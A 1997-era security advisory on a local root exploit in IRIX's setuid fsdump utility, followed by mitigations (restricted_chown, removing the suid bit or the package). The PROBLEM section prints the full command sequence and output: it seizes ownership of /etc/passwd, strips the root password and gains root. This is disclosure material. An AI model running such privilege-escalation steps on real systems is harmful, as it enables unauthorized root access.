COMMAND

    /var/rfindd/fsdump

SYSTEMS AFFECTED

    IRIX 5.x, 6.0, 6.0.1, 6.1, 6.2

PROBLEM

    The   fsdump   program   is   found   in   the  eoe.sw.rfindd  and
    eoe2.sw.rfindd  subsystems  which  are  not  installed by default.
    As  optional  subsystems,  these   packages  must  be   explicitly
    installed for use.  Only systems with  the fsdump program  present
    are vulnerable.

    Chris Sheldon <csh@VIEWGRAPHICS.COM> has found yet another IRIX 5.3
    root exploit.   Of course,  the major  problem here  is that  IRIX
    allow users to  give away ownership  of files. Without  that, this
    could only be  used for changing  the permissions on  file so that
    you could read and modify.

        The system (an Indy):
        IRIX irix 5.3 11091812 IP22 mips

        irix% ls -la /var/rfindd/fsdump
        ---s--x--x    1 root     sys        62032 Jul 25  1995 /var/rfindd/fsdump

    What tipped Chris off that it was exploitable was the fact that it
    was a protected suid binary (---s--x--x). I thought: if someone at
    SGI is being  careful to not  let non-root users  read the binary,
    then it *must* be packed with holes... :-)

    So, I'm just a normal user today...

        irix% id
        uid=1799(csh) gid=500(users)

        irix% /var/rfindd/fsdump -L/etc/passwd -F/tmp/dump /
        (count to three, and hit ctrl-c)

        irix% ls -la /etc/passwd
        -rw-r--r--    1 csh      users        956 Feb 25 06:23 /etc/passwd

    And now I've got root access...

        irix% tail -8 /etc/passwd
        nobody:*:60001:60001:SVR4 nobody uid:/dev/null:/dev/null
        noaccess:*:60002:60002:uid no access:/dev/null:/dev/null
        nobody:*:-2:-2:original nobody uid:/dev/null:/dev/null

        Tue Feb 25 06:23:48 PST 1997
        Number of inodes total 208740; allocated 31259
        Collecting garbage.
        interrupted

    All you have to do is  edit off the garbage from the  passwd file,
    delete the  encrypted root  password and  reset the  perms on  the
    passwd file.

        irix% vi /etc/passwd            # remove the encrypted root password
        irix% chgrp sys /etc/passwd
        irix% chown root /etc/passwd
        irix% su -
        irix#

    This can  be used  to access  pretty much  any file  on the system
    which is currently group owned...

SOLUTION

    Larry Glaze <lglaze@MC2-CSR.COM>  suggested to remove  the file
    giveaway priviledge?

        pandora 2# systune -i
        Updates will be made to running system and /unix.install
        systune-> restricted_chown 1
                restricted_chown = 1 (0x1)
                Do you really want to change restricted_chown to 1 (0x1)?  (y/n) y

    In order for  the change in  parameter restricted_chown to  become
    effective, reboot the system

        systune->q
        pandora 3# /etc/reboot

    Anyway,  solution  would  be  also  to  remove  fsdump   subsystem
    entirely,  it's  about  as  useless  (and  unused) as any piece of
    software could  be.   Removing suid  bit works  as well as another
    solution  to  this  vulnerability.   No  patches  available.   SGI
    supports idea  of changing  permissions or  removin entire package
    from system.